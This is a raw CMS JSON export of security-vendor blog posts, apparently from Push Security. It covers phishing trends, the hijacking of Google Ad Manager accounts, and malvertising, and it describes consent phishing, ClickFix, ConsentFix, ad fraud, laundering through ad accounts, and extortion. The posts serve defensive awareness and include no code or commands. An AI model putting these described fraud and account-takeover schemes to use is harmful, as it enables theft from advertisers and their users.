controls)",[39901],{"type":370},{},{"nodeType":178,"data":39904,"content":39905},{},[39906],{"nodeType":173,"value":39907,"marks":39908,"data":39909},"We already mentioned that MFA downgrade has been an area of focus for security researchers and attackers. But phishing-resistant authentication methods (i.e. passkeys) remain effective so long as the phishing-resistant factor is the only possible login factor, and there are no backup methods enabled for the account. (Though because of the logistical issues of having just one factor, this is fairly uncommon.) ",[],{},{"nodeType":178,"data":39911,"content":39912},{},[39913],{"nodeType":173,"value":39914,"marks":39915,"data":39916},"Equally, access control policies can be applied on larger enterprise apps and cloud platforms to reduce the risk of unauthorized access (although these can be tricky to implement and maintain without error).",[],{},{"nodeType":178,"data":39918,"content":39919},{},[39920],{"nodeType":173,"value":39921,"marks":39922,"data":39923},"In any case, attackers are considering all eventualities and looking for alternative ways into accounts that are less well protected. This mainly involves attackers circumventing the standard authentication process, through techniques such as:",[],{},{"nodeType":250,"data":39925,"content":39926},{},[39927,39954,39980],{"nodeType":254,"data":39928,"content":39929},{},[39930],{"nodeType":178,"data":39931,"content":39932},{},[39933,39936,39945,39950],{"nodeType":173,"value":37,"marks":39934,"data":39935},[],{},{"nodeType":186,"data":39937,"content":39938},{"uri":19838},[39939],{"nodeType":173,"value":39940,"marks":39941,"data":39944},"Consent phishing",[39942,39943],{"type":194},{"type":370},{},{"nodeType":173,"value":39946,"marks":39947,"data":39949},":",[39948],{"type":370},{},{"nodeType":173,"value":39951,"marks":39952,"data":39953}," Tricking victims into connecting malicious OAuth apps into their app tenant.",[],{},{"nodeType":254,"data":39955,"content":39956},{},[39957],{"nodeType":178,"data":39958,"content":39959},{},[39960,39963,39971,39976],{"nodeType":173,"value":37,"marks":39961,"data":39962},[],{},{"nodeType":186,"data":39964,"content":39965},{"uri":9275},[39966],{"nodeType":173,"value":9278,"marks":39967,"data":39970},[39968,39969],{"type":194},{"type":370},{},{"nodeType":173,"value":39972,"marks":39973,"data":39975},": ",[39974],{"type":370},{},{"nodeType":173,"value":39977,"marks":39978,"data":39979},"The same as consent phishing, but authorizing through the device code flow designed for device logins that cannot support OAuth, by providing a substitute passcode. ",[],{},{"nodeType":254,"data":39981,"content":39982},{},[39983],{"nodeType":178,"data":39984,"content":39985},{},[39986,39991],{"nodeType":173,"value":39987,"marks":39988,"data":39990},"Malicious browser extensions: ",[39989],{"type":370},{},{"nodeType":173,"value":39992,"marks":39993,"data":39994},"Tricking victims into installing a malicious extension (or hijacking an existing one) to steal credentials and cookies from the browser. ",[],{},{"nodeType":312,"data":39996,"content":40000},{"target":39997},{"sys":39998},{"id":39999,"type":317,"linkType":318},"75lMjdJtq9APebTaF2hQ1b",[],{"nodeType":312,"data":40002,"content":40006},{"target":40003},{"sys":40004},{"id":40005,"type":317,"linkType":318},"4KWwlg8PsuyAud8i5tpWfH",[],{"nodeType":178,"data":40008,"content":40009},{},[40010,40014,40022,40026,40035],{"nodeType":173,"value":40011,"marks":40012,"data":40013},"Another technique that attackers are using to steal credentials and sessions is ",[],{},{"nodeType":186,"data":40015,"content":40017},{"uri":40016},"https://pushsecurity.com/blog/the-most-advanced-clickfix-yet",[40018],{"nodeType":173,"value":1845,"marks":40019,"data":40021},[40020],{"type":194},{},{"nodeType":173,"value":40023,"marks":40024,"data":40025},". ClickFix was the ",[],{},{"nodeType":186,"data":40027,"content":40029},{"uri":40028},"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/msc/documents/presentations/CSR/Microsoft-Digital-Defense-Report-2025.pdf#page=36",[40030],{"nodeType":173,"value":40031,"marks":40032,"data":40034},"top initial access vector detected by Microsoft last year",[40033],{"type":194},{},{"nodeType":173,"value":40036,"marks":40037,"data":40038},", involved in 47% of attacks. While not a traditional phishing attack, this sees attackers socially engineer users into running malicious code on their machine, typically deploying remote access tools and infostealer malware. Infostealers are then used to harvest credentials and cookies for initial access to various apps and services. ",[],{},{"nodeType":312,"data":40040,"content":40044},{"target":40041},{"sys":40042},{"id":40043,"type":317,"linkType":318},"4cC9GbPoKFmYUJgbkbeOLs",[],{"nodeType":178,"data":40046,"content":40047},{},[40048,40052,40060],{"nodeType":173,"value":40049,"marks":40050,"data":40051},"Push Security researchers have also discovered a brand new technique dubbed ",[],{},{"nodeType":186,"data":40053,"content":40055},{"uri":40054},"https://pushsecurity.com/blog/consentfix",[40056],{"nodeType":173,"value":1857,"marks":40057,"data":40059},[40058],{"type":194},{},{"nodeType":173,"value":40061,"marks":40062,"data":40063}," — a browser-native version of ClickFix that results in an OAuth connection being established to the target app, simply by copying and pasting a legitimate URL containing OAuth key material. ",[],{},{"nodeType":312,"data":40065,"content":40069},{"target":40066},{"sys":40067},{"id":40068,"type":317,"linkType":318},"4bdqleePd53oK5v5uEUFbr",[],{"nodeType":178,"data":40071,"content":40072},{},[40073],{"nodeType":173,"value":40074,"marks":40075,"data":40076},"This is even more dangerous than ClickFix as it is entirely browser-native — removing the endpoint detection surface (and strong security controls like EDR) from the equation entirely. And in the particular case spotted by Push, the attackers targeted Azure CLI — a first-party Microsoft app that has special permissions and can’t be restricted like third-party apps. ",[],{},{"nodeType":178,"data":40078,"content":40079},{},[40080],{"nodeType":173,"value":40081,"marks":40082,"data":40083},"Really, there are lots of different techniques attackers can use to take over accounts on key business applications — it’s outdated to think of phishing as being locked in to passwords, MFA, and the standard authentication flow. ",[],{},{"nodeType":312,"data":40085,"content":40089},{"target":40086},{"sys":40087},{"id":40088,"type":317,"linkType":318},"74S97KkuFzI48UwXw3msTq",[],{"nodeType":231,"data":40091,"content":40092},{},[],{"nodeType":169,"data":40094,"content":40095},{},[40096],{"nodeType":173,"value":40097,"marks":40098,"data":40100},"Guidance for security teams in 2026",[40099],{"type":370},{},{"nodeType":178,"data":40102,"content":40103},{},[40104],{"nodeType":173,"value":40105,"marks":40106,"data":40107},"To tackle phishing in 2026, security teams need to change their threat model for phishing, and acknowledge that:",[],{},{"nodeType":250,"data":40109,"content":40110},{},[40111,40121,40131],{"nodeType":254,"data":40112,"content":40113},{},[40114],{"nodeType":178,"data":40115,"content":40116},{},[40117],{"nodeType":173,"value":40118,"marks":40119,"data":40120},"It’s not enough to protect email as your main anti-phishing surface",[],{},{"nodeType":254,"data":40122,"content":40123},{},[40124],{"nodeType":178,"data":40125,"content":40126},{},[40127],{"nodeType":173,"value":40128,"marks":40129,"data":40130},"Network and traffic monitoring tools aren’t keeping up with modern phishing pages",[],{},{"nodeType":254,"data":40132,"content":40133},{},[40134],{"nodeType":178,"data":40135,"content":40136},{},[40137],{"nodeType":173,"value":40138,"marks":40139,"data":40140},"Phishing-resistant authentication, even if perfectly implemented, doesn’t make you immune",[],{},{"nodeType":178,"data":40142,"content":40143},{},[40144],{"nodeType":173,"value":40145,"marks":40146,"data":40147},"Detection and response is key. But most organizations have significant visibility gaps.",[],{},{"nodeType":231,"data":40149,"content":40150},{},[],{"nodeType":169,"data":40152,"content":40153},{},[40154],{"nodeType":173,"value":40155,"marks":40156,"data":40158},"Solving the detection gap in the browser",[40157],{"type":370},{},{"nodeType":178,"data":40160,"content":40161},{},[40162],{"nodeType":173,"value":40163,"marks":40164,"data":40165},"One thing that these attacks have in common is that they all take place in the web browser, targeting users as they go about their work on the internet. That makes it the perfect place to detect and respond to these attacks. But right now, the browser is a blind-spot for most security teams.",[],{},{"nodeType":178,"data":40167,"content":40168},{},[40169],{"nodeType":173,"value":40170,"marks":40171,"data":40172},"Push Security’s browser-based security platform provides comprehensive detection and response capabilities against the leading cause of breaches. Push blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, and session hijacking. You don’t need to wait until it all goes wrong — you can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack surface.",[],{},{"nodeType":178,"data":40174,"content":40175},{},[40176,40179,40186,40189,40196],{"nodeType":173,"value":1451,"marks":40177,"data":40178},[],{},{"nodeType":186,"data":40180,"content":40181},{"uri":1456},[40182],{"nodeType":173,"value":1459,"marks":40183,"data":40185},[40184],{"type":194},{},{"nodeType":173,"value":1464,"marks":40187,"data":40188},[],{},{"nodeType":186,"data":40190,"content":40191},{"uri":1469},[40192],{"nodeType":173,"value":1472,"marks":40193,"data":40195},[40194],{"type":194},{},{"nodeType":173,"value":1477,"marks":40197,"data":40198},[],{},{"nodeType":312,"data":40200,"content":40203},{"target":40201},{"sys":40202},{"id":8590,"type":317,"linkType":318},[],{"nodeType":178,"data":40205,"content":40206},{},[40207],{"nodeType":173,"value":37,"marks":40208,"data":40209},[],{},"2025’s top phishing trends — and what they mean for your 2026 security strategy","Analysing the key trends that defined phishing attacks in 2025, and what these changes mean for security teams heading into 2026. ","2025-12-15T00:00:00.000Z","2025-top-phishing-trends",{"items":40215},[40216,40218],{"sys":40217,"name":509},{"id":508},{"sys":40219,"name":505},{"id":504},{"items":40221},[40222],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":40223},{"url":1496},{"items":40225},[40226],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":40227},{"url":1496},{"json":40229,"links":40700},{"nodeType":165,"data":40230,"content":40231},{},[40232,40239,40245,40307,40310,40317,40323,40329,40336,40343,40346,40354,40369,40375,40382,40448,40455,40461,40468,40474,40477,40485,40492,40499,40506,40513,40519,40522,40530,40537,40544,40551,40580,40587,40593,40596,40604,40611,40618,40625,40628,40636,40643,40650,40656,40662,40689,40694],{"nodeType":178,"data":40233,"content":40234},{},[40235],{"nodeType":173,"value":40236,"marks":40237,"data":40238},"In recent months, we’ve seen a significant increase in the number of attacks targeting ad manager accounts. These attacks range from phishing campaigns against marketing professionals to malicious sites impersonating legitimate marketing tools — ultimately serving up an Attacker-in-the-Middle (AITM) phishing page designed to steal the victim’s Google account. ",[],{},{"nodeType":178,"data":40240,"content":40241},{},[40242],{"nodeType":173,"value":13999,"marks":40243,"data":40244},[],{},{"nodeType":250,"data":40246,"content":40247},{},[40248,40267,40286],{"nodeType":254,"data":40249,"content":40250},{},[40251],{"nodeType":178,"data":40252,"content":40253},{},[40254,40257,40264],{"nodeType":173,"value":14012,"marks":40255,"data":40256},[],{},{"nodeType":186,"data":40258,"content":40259},{"uri":14017},[40260],{"nodeType":173,"value":14020,"marks":40261,"data":40263},[40262],{"type":194},{},{"nodeType":173,"value":14025,"marks":40265,"data":40266},[],{},{"nodeType":254,"data":40268,"content":40269},{},[40270],{"nodeType":178,"data":40271,"content":40272},{},[40273,40276,40283],{"nodeType":173,"value":14035,"marks":40274,"data":40275},[],{},{"nodeType":186,"data":40277,"content":40278},{"uri":14040},[40279],{"nodeType":173,"value":14043,"marks":40280,"data":40282},[40281],{"type":194},{},{"nodeType":173,"value":14048,"marks":40284,"data":40285},[],{},{"nodeType":254,"data":40287,"content":40288},{},[40289],{"nodeType":178,"data":40290,"content":40291},{},[40292,40296,40304],{"nodeType":173,"value":40293,"marks":40294,"data":40295},"A continuation of the Google Ads malvertising campaign, ",[],{},{"nodeType":186,"data":40297,"content":40299},{"uri":40298},"https://pushsecurity.com/blog/google-search-malvertising-campaign-continues-now-impersonating-ahrefs",[40300],{"nodeType":173,"value":40301,"marks":40302,"data":40303},"this time impersonating Ahrefs",[],{},{"nodeType":173,"value":197,"marks":40305,"data":40306},[],{},{"nodeType":231,"data":40308,"content":40309},{},[],{"nodeType":169,"data":40311,"content":40312},{},[40313],{"nodeType":173,"value":14169,"marks":40314,"data":40316},[40315],{"type":370},{},{"nodeType":178,"data":40318,"content":40319},{},[40320],{"nodeType":173,"value":14177,"marks":40321,"data":40322},[],{},{"nodeType":178,"data":40324,"content":40325},{},[40326],{"nodeType":173,"value":14184,"marks":40327,"data":40328},[],{},{"nodeType":178,"data":40330,"content":40331},{},[40332],{"nodeType":173,"value":40333,"marks":40334,"data":40335},"A hijacked Google Ad Manager account gives attackers access to significant ad spend and account data which can be monetized. The tactics range from stealthy ad fraud to overt abuse like malicious ads or extortion schemes.",[],{},{"nodeType":178,"data":40337,"content":40338},{},[40339],{"nodeType":173,"value":40340,"marks":40341,"data":40342},"Here’s how attackers can profit from a compromised ad manager account — and how it impacts your business. ",[],{},{"nodeType":231,"data":40344,"content":40345},{},[],{"nodeType":235,"data":40347,"content":40348},{},[40349],{"nodeType":173,"value":40350,"marks":40351,"data":40353},"Malvertising",[40352],{"type":370},{},{"nodeType":178,"data":40355,"content":40356},{},[40357,40361,40365],{"nodeType":173,"value":40358,"marks":40359,"data":40360},"Arguably the most dangerous use of a compromised ad manager account is to conduct ",[],{},{"nodeType":173,"value":8046,"marks":40362,"data":40364},[40363],{"type":370},{},{"nodeType":173,"value":40366,"marks":40367,"data":40368}," – inserting malicious ads or redirects in place of legitimate advertisements. ",[],{},{"nodeType":178,"data":40370,"content":40371},{},[40372],{"nodeType":173,"value":14240,"marks":40373,"data":40374},[],{},{"nodeType":178,"data":40376,"content":40377},{},[40378],{"nodeType":173,"value":40379,"marks":40380,"data":40381},"The goal here is usually to compromise more devices and accounts, via:",[],{},{"nodeType":250,"data":40383,"content":40384},{},[40385,40395,40405,40438],{"nodeType":254,"data":40386,"content":40387},{},[40388],{"nodeType":178,"data":40389,"content":40390},{},[40391],{"nodeType":173,"value":40392,"marks":40393,"data":40394},"AITM phishing sites looking to hijack sessions on valuable accounts — usually enterprise SSO accounts such as Google or Microsoft, but also many high-value SaaS services, as well as logins for banking and cryptocurrency sites.. ",[],{},{"nodeType":254,"data":40396,"content":40397},{},[40398],{"nodeType":178,"data":40399,"content":40400},{},[40401],{"nodeType":173,"value":40402,"marks":40403,"data":40404},"Deploying infostealer malware, harvesting credentials and user sessions from the compromised device to enable broad access to apps via compromised accounts. ",[],{},{"nodeType":254,"data":40406,"content":40407},{},[40408],{"nodeType":178,"data":40409,"content":40410},{},[40411,40415,40422,40426,40434],{"nodeType":173,"value":40412,"marks":40413,"data":40414},"Running ",[],{},{"nodeType":186,"data":40416,"content":40417},{"uri":1842},[40418],{"nodeType":173,"value":1845,"marks":40419,"data":40421},[40420],{"type":194},{},{"nodeType":173,"value":40423,"marks":40424,"data":40425},"-style social engineering scams prompting users to perform a malicious action (typically running code on their device, although a new browser-native version of this attack in the form of ",[],{},{"nodeType":186,"data":40427,"content":40428},{"uri":1854},[40429],{"nodeType":173,"value":40430,"marks":40431,"data":40433},"ConsentFix ",[40432],{"type":194},{},{"nodeType":173,"value":40435,"marks":40436,"data":40437},"was recently discovered by Push researchers).",[],{},{"nodeType":254,"data":40439,"content":40440},{},[40441],{"nodeType":178,"data":40442,"content":40443},{},[40444],{"nodeType":173,"value":40445,"marks":40446,"data":40447},"Infecting machines with malicious software to siphon compute power for cryptomining or adding the device to a botnet used in DDOS attacks. ",[],{},{"nodeType":178,"data":40449,"content":40450},{},[40451],{"nodeType":173,"value":40452,"marks":40453,"data":40454},"Harvested data can be used by the attacker directly to conduct cyber attacks, but is more commonly sold on to other criminals further up the supply chain. So, attackers are using compromised ad accounts, to take over more accounts used to manage ads, to take over even more accounts… You can see how this can quickly snowball into something hugely profitable for attackers. ",[],{},{"nodeType":312,"data":40456,"content":40460},{"target":40457},{"sys":40458},{"id":40459,"type":317,"linkType":318},"1Ji0oUqCZvgmQIT2VWNgjQ",[],{"nodeType":178,"data":40462,"content":40463},{},[40464],{"nodeType":173,"value":40465,"marks":40466,"data":40467},"Malvertising scams don’t just target ad manager accounts either. They can be found targeting all manner of sites. But all malvertising scams are underpinned by ad spending — so it makes sense that attackers are looking to harvest account access and make use of the pre-allocated marketing spend of their victims. ",[],{},{"nodeType":312,"data":40469,"content":40473},{"target":40470},{"sys":40471},{"id":40472,"type":317,"linkType":318},"7qpSbkJxLeo7zD400cvQyv",[],{"nodeType":231,"data":40475,"content":40476},{},[],{"nodeType":235,"data":40478,"content":40479},{},[40480],{"nodeType":173,"value":40481,"marks":40482,"data":40484},"Ad fraud",[40483],{"type":370},{},{"nodeType":178,"data":40486,"content":40487},{},[40488],{"nodeType":173,"value":40489,"marks":40490,"data":40491},"One of the most common motives for hacking ad accounts is ad fraud – generating fake ad impressions or clicks to illicitly collect advertising revenue. By hijacking a Google Ad Manager account, criminals can direct the account’s ad spend to their own fraudulent web pages.",[],{},{"nodeType":178,"data":40493,"content":40494},{},[40495],{"nodeType":173,"value":40496,"marks":40497,"data":40498},"When a Google Ads/Ad Manager account is compromised, attackers can create new campaigns or modify existing ones. By directing traffic to websites the criminals control (often low quality sites made specifically for advertising) the victim’s ad budget can be funnelled into the attackers’ pockets as ad revenue.",[],{},{"nodeType":178,"data":40500,"content":40501},{},[40502],{"nodeType":173,"value":40503,"marks":40504,"data":40505},"The hijacked ad accounts provide a means to introduce fraudulent traffic into legitimate ad ecosystems, often escaping immediate detection thanks to the account’s established trust or high spending thresholds. For example, a compromised account with a large budget can run thousands of ads pointing to fraudulent sites before being flagged. ",[],{},{"nodeType":178,"data":40507,"content":40508},{},[40509],{"nodeType":173,"value":40510,"marks":40511,"data":40512},"This is often abused as a channel for money laundering. An attacker can inject dirty money into the ad ecosystem (for example, using a compromised advertiser account’s billing) and then receive clean money out the other end (as payments to a publisher or ad partner account they control). ",[],{},{"nodeType":312,"data":40514,"content":40518},{"target":40515},{"sys":40516},{"id":40517,"type":317,"linkType":318},"21ryRzAB91llJXOVlkdiv5",[],{"nodeType":231,"data":40520,"content":40521},{},[],{"nodeType":235,"data":40523,"content":40524},{},[40525],{"nodeType":173,"value":40526,"marks":40527,"data":40529},"Selling or sharing access with other criminal groups ",[40528],{"type":370},{},{"nodeType":178,"data":40531,"content":40532},{},[40533],{"nodeType":173,"value":40534,"marks":40535,"data":40536},"Stolen advertising accounts themselves have become a commodity in the underground economy. Instead of (or in addition to) exploiting the account personally, a hacker might sell access to the compromised Ad Manager account on criminal forums. ",[],{},{"nodeType":178,"data":40538,"content":40539},{},[40540],{"nodeType":173,"value":40541,"marks":40542,"data":40543},"There is strong demand for reputable ad accounts because they come with advantages: high spending limits, established credit card billing, a history of compliance (making them less likely to be flagged by Google’s fraud detection), and existing relationships with ad networks or clients. In other words, a hijacked account is a ready-made vehicle for anyone looking to run malicious ad campaigns without going through the usual vetting.",[],{},{"nodeType":178,"data":40545,"content":40546},{},[40547],{"nodeType":173,"value":40548,"marks":40549,"data":40550},"Access to a Google Ads account (especially one with a good track record or high credit threshold) can fetch a significant price in criminal markets. Compromised Google ad accounts have shown up for sale on hacker forums and darknet markets, often advertised with details like the account’s age, billing history, or spend limit. For example, a hacker on one forum might sell or rent a “2-year-old Google Ads account with $50k monthly spend history” for a price commensurate with its potential yield.",[],{},{"nodeType":178,"data":40552,"content":40553},{},[40554,40558,40567,40571,40576],{"nodeType":173,"value":40555,"marks":40556,"data":40557},"The previously mentioned ",[],{},{"nodeType":186,"data":40559,"content":40561},{"uri":40560},"https://cloud.google.com/blog/topics/threat-intelligence/vietnamese-actors-fake-job-posting-campaigns",[40562],{"nodeType":173,"value":40563,"marks":40564,"data":40566},"Vietnamese threat group",[40565],{"type":194},{},{"nodeType":173,"value":40568,"marks":40569,"data":40570}," would ",[],{},{"nodeType":173,"value":40572,"marks":40573,"data":40575},"“either sell ads to other actors, or sell the accounts themselves to other actors to monetize”",[40574],{"type":370},{},{"nodeType":173,"value":40577,"marks":40578,"data":40579},". This means an attacker could use a compromised account as a platform to sell fraudulent ad placements (e.g. “pay us and we’ll run your ads via this legitimate account for X days”). If not, they just sell the whole account login to the highest bidder.",[],{},{"nodeType":178,"data":40581,"content":40582},{},[40583],{"nodeType":173,"value":40584,"marks":40585,"data":40586},"It’s also worth noting that a Google Ad Manager account is also an enterprise SSO account that can be used to access broader Google Workspace services, and any SaaS apps accessible via SSO. ",[],{},{"nodeType":312,"data":40588,"content":40592},{"target":40589},{"sys":40590},{"id":40591,"type":317,"linkType":318},"1RrDk0VMWNGwPPEc8wIZWM",[],{"nodeType":231,"data":40594,"content":40595},{},[],{"nodeType":235,"data":40597,"content":40598},{},[40599],{"nodeType":173,"value":40600,"marks":40601,"data":40603},"Data theft and extortion",[40602],{"type":370},{},{"nodeType":178,"data":40605,"content":40606},{},[40607],{"nodeType":173,"value":40608,"marks":40609,"data":40610},"Most ad accounts contain valuable data – like audience lists, conversion data, or payment info. Attackers could exfiltrate this data and extort the victim by threatening to leak it or sell it (though this borders on a data breach scenario, it’s another way to extort via an ad account hack, especially for large advertising agencies handling many clients’ data).",[],{},{"nodeType":178,"data":40612,"content":40613},{},[40614],{"nodeType":173,"value":40615,"marks":40616,"data":40617},"An attacker might also threaten to manipulate the account in ways that hurt the victim financially. For instance, they could create fake campaigns that burn through the budget on useless traffic (driving up costs with nothing to show, or even causing overcharges). They could also threaten to click-bomb the victim’s ads (if it’s an advertiser account) so that Google’s systems detect invalid activity and suspend the account. ",[],{},{"nodeType":178,"data":40619,"content":40620},{},[40621],{"nodeType":173,"value":40622,"marks":40623,"data":40624},"For the victim, the cost of reputational damage or lost advertising time can far exceed the ransom demand, which is why some might contemplate paying. A large brand could lose consumer confidence or partner relationships if their ads serve malware for even a short time. Agencies managing several client ad accounts could face client complaints and legal liability if an attack spreads offensive ads via their accounts – such agencies have noted the “serious financial threats” and client dissatisfaction resulting from ad account breaches.",[],{},{"nodeType":231,"data":40626,"content":40627},{},[],{"nodeType":169,"data":40629,"content":40630},{},[40631],{"nodeType":173,"value":40632,"marks":40633,"data":40635},"Conclusion",[40634],{"type":370},{},{"nodeType":178,"data":40637,"content":40638},{},[40639],{"nodeType":173,"value":40640,"marks":40641,"data":40642},"Pretty much every enterprise today advertises their services via Google ads — this makes attacks on these accounts a unanimous problem. Agencies managing numerous client accounts are put further at risk. For example, if an attacker can compromise an MCC account (used to manage several ad accounts) they get full access to the agency’s customer portfolio. ",[],{},{"nodeType":178,"data":40644,"content":40645},{},[40646],{"nodeType":173,"value":40647,"marks":40648,"data":40649},"Organisations need to be on guard against both attacks on accounts used to manage ads, and malvertising in general — which is an incredibly prevalent threat and one of the top delivery vectors for phishing attacks today. Malvertising attacks delivered over channels like Google Search are a great way to catch victims unawares while also evading typically email-based anti-phishing controls. ",[],{},{"nodeType":178,"data":40651,"content":40652},{},[40653],{"nodeType":173,"value":14302,"marks":40654,"data":40655},[],{},{"nodeType":312,"data":40657,"content":40661},{"target":40658},{"sys":40659},{"id":40660,"type":317,"linkType":318},"3VJGhlTaAAOyJckK2yUfZd",[],{"nodeType":178,"data":40663,"content":40664},{},[40665,40669,40676,40679,40686],{"nodeType":173,"value":40666,"marks":40667,"data":40668},"To learn more about how Push tackles browser-based threats, ",[],{},{"nodeType":186,"data":40670,"content":40671},{"uri":1456},[40672],{"nodeType":173,"value":1459,"marks":40673,"data":40675},[40674],{"type":194},{},{"nodeType":173,"value":1464,"marks":40677,"data":40678},[],{},{"nodeType":186,"data":40680,"content":40681},{"uri":1469},[40682],{"nodeType":173,"value":1472,"marks":40683,"data":40685},[40684],{"type":194},{},{"nodeType":173,"value":1477,"marks":40687,"data":40688},[],{},{"nodeType":312,"data":40690,"content":40693},{"target":40691},{"sys":40692},{"id":20492,"type":317,"linkType":318},[],{"nodeType":178,"data":40695,"content":40696},{},[40697],{"nodeType":173,"value":37,"marks":40698,"data":40699},[],{},{"entries":40701},{"hyperlink":40702,"inline":40703,"block":40704},[],[],[40705,40711,40725,40803,40837,40850],{"sys":40706,"__typename":5345,"title":40707,"caption":40708,"layoutMode":118,"file":40709},{"id":40459},"Propagation of malvertising","It’s easy to see how malicious ads can propagate and turn into more malicious ads, leading to more campaigns impersonating more brands, more account compromises, and so on. ",{"url":40710,"width":5358,"height":23887},"https://images.ctfassets.net/y1cdw1ablpvd/3iUNORa8hHXi68kZAsFxi8/1a742458ae768bc14a1ba1f6cf26de41/image1.png",{"sys":40712,"__typename":5311,"content":40713,"name":40724,"title":118},{"id":40472},{"json":40714},{"nodeType":165,"data":40715,"content":40716},{},[40717],{"nodeType":178,"data":40718,"content":40719},{},[40720],{"nodeType":173,"value":40721,"marks":40722,"data":40723},"Large enterprises spend vast amounts on Google Ads, often starting at $20,000+ per month, with major brands sometimes spending $40 to $50 million annually, depending heavily on their competitive industry. So, there’s a lot to play with for an attacker — and it might be some time before a discrepancy is noticed by the victim. ",[],{},"Malvertising insight box 4",{"sys":40726,"__typename":5311,"content":40727,"name":40802,"title":118},{"id":40517},{"json":40728},{"nodeType":165,"data":40729,"content":40730},{},[40731,40759],{"nodeType":178,"data":40732,"content":40733},{},[40734,40738,40746,40750,40755],{"nodeType":173,"value":40735,"marks":40736,"data":40737},"In late 2025, agencies noticed a surge of Google Ads account takeovers where hackers ran unauthorized campaigns until budgets were exhausted. ",[],{},{"nodeType":186,"data":40739,"content":40740},{"uri":40560},[40741],{"nodeType":173,"value":40742,"marks":40743,"data":40745},"Google’s Threat Analysis Group found a cluster of Vietnamese actors",[40744],{"type":194},{},{"nodeType":173,"value":40747,"marks":40748,"data":40749}," who hijacked marketing accounts to ",[],{},{"nodeType":173,"value":40751,"marks":40752,"data":40754},"“either sell ads to other actors, or sell the accounts themselves”",[40753],{"type":370},{},{"nodeType":173,"value":40756,"marks":40757,"data":40758}," for profit. ",[],{},{"nodeType":178,"data":40760,"content":40761},{},[40762,40766,40775,40779,40788,40792,40799],{"nodeType":173,"value":40763,"marks":40764,"data":40765},"Similarly, a series of attacks on companies managing ads ",[],{},{"nodeType":186,"data":40767,"content":40769},{"uri":40768},"https://www.adexchanger.com/online-advertising/people-managing-google-ad-campaigns-are-getting-their-accounts-seized-by-scammers/",[40770],{"nodeType":173,"value":40771,"marks":40772,"data":40774},"reported that their accounts had been hacked as early as January 2025",[40773],{"type":194},{},{"nodeType":173,"value":40776,"marks":40777,"data":40778},". These attacks were linked to ",[],{},{"nodeType":186,"data":40780,"content":40782},{"uri":40781},"https://www.malwarebytes.com/blog/news/2025/01/the-great-google-ads-heist-criminals-ransack-advertiser-accounts-via-fake-google-ads",[40783],{"nodeType":173,"value":40784,"marks":40785,"data":40787},"South American scam operations by MalwareBytes",[40786],{"type":194},{},{"nodeType":173,"value":40789,"marks":40790,"data":40791}," — likely the same group behind ",[],{},{"nodeType":186,"data":40793,"content":40794},{"uri":40298},[40795],{"nodeType":173,"value":40796,"marks":40797,"data":40798},"the attacks we recently identified",[],{},{"nodeType":173,"value":197,"marks":40800,"data":40801},[],{},"Malvertising insight box 1",{"sys":40804,"__typename":5311,"content":40805,"name":40836,"title":118},{"id":40591},{"json":40806},{"data":40807,"content":40808,"nodeType":165},{},[40809],{"data":40810,"content":40811,"nodeType":178},{},[40812,40816,40821,40831],{"data":40813,"marks":40814,"value":40815,"nodeType":173},{},[],"Even if the victim isn’t predominantly a Google shop, a Google account using the same email as a different identity provider account (e.g. Microsoft) can still be used to access downstream apps via SSO. This is because most apps use the email itself as the identifier, while 3 in 5 allow you to access an account using a new login method without doing any further verification checks. ",{"data":40817,"marks":40818,"value":40820,"nodeType":173},{},[40819],{"type":370},"Read our ",{"data":40822,"content":40824,"nodeType":186},{"uri":40823},"https://pushsecurity.com/blog/cross-idp-impersonation/",[40825],{"data":40826,"marks":40827,"value":40830,"nodeType":173},{},[40828,40829],{"type":194},{"type":370},"blog post on cross-IdP impersonation",{"data":40832,"marks":40833,"value":40835,"nodeType":173},{},[40834],{"type":370}," for more information. ","Malvertising insight box 2",{"sys":40838,"__typename":5311,"content":40839,"name":40849,"title":118},{"id":40660},{"json":40840},{"nodeType":165,"data":40841,"content":40842},{},[40843],{"nodeType":178,"data":40844,"content":40845},{},[40846],{"nodeType":173,"value":14309,"marks":40847,"data":40848},[],{},"Malvertising insight box 3",{"sys":40851,"__typename":15269,"type":15270,"ctaText":38140,"buttonLabel":15277,"buttonColour":15273,"buttonUrl":38141},{"id":20492},"content:blog:cyber-criminal-ecosystem-analysis.json","blog/cyber-criminal-ecosystem-analysis.json","blog/cyber-criminal-ecosystem-analysis",{"_path":40856,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":40857,"ogImage":118,"summary":40859,"title":6639,"subtitle":118,"metaTitle":40870,"synopsis":14583,"hashTags":118,"publishedDate":14584,"slug":6640,"tagsCollection":40871,"relatedBlogPostsCollection":40877,"authorsCollection":42295,"content":42299,"_id":42955,"_type":5439,"_source":5440,"_file":42956,"_stem":42957,"_extension":5439},"/blog/google-search-malvertising-campaign-continues-now-impersonating-ahrefs",{"id":1702,"publishedAt":40858},"2026-02-25T08:00:04.199Z",{"json":40860},{"data":40861,"content":40862,"nodeType":165},{},[40863],{"data":40864,"content":40865,"nodeType":178},{},[40866],{"data":40867,"marks":40868,"value":40869,"nodeType":173},{},[],"In December, we reported on malvertising attacks delivered via Google Search specifically targeting Google Ad Manager accounts. Now, we’ve intercepted more attacks targeting Push customers, this time impersonating Ahrefs. Here’s what you need to know. ","Google Search malvertising campaign impersonating Ahrefs",{"items":40872},[40873,40875],{"sys":40874,"name":509},{"id":508},{"sys":40876,"name":505},{"id":504},{"items":40878},[40879,41316,41703],{"__typename":1528,"sys":40880,"content":40882,"title":41302,"synopsis":41303,"hashTags":118,"publishedDate":41304,"slug":41305,"tagsCollection":41306,"authorsCollection":41312},{"id":40881},"2obwh6WiK5IP0hnqsV4CZQ",{"json":40883},{"data":40884,"content":40885,"nodeType":165},{},[40886,40893,40900,40907,40914,40920,40923,40930,40937,40943,40950,40956,40962,40969,40975,40982,40988,40995,41001,41004,41012,41030,41038,41056,41074,41080,41088,41106,41112,41118,41125,41128,41136,41155,41161,41168,41171,41178,41194,41200,41233,41236,41243,41259,41265,41291,41296],{"data":40887,"content":40888,"nodeType":178},{},[40889],{"data":40890,"marks":40891,"value":40892,"nodeType":173},{},[],"We recently detected and blocked a particularly well-crafted malvertising attack targeting one of our customers. 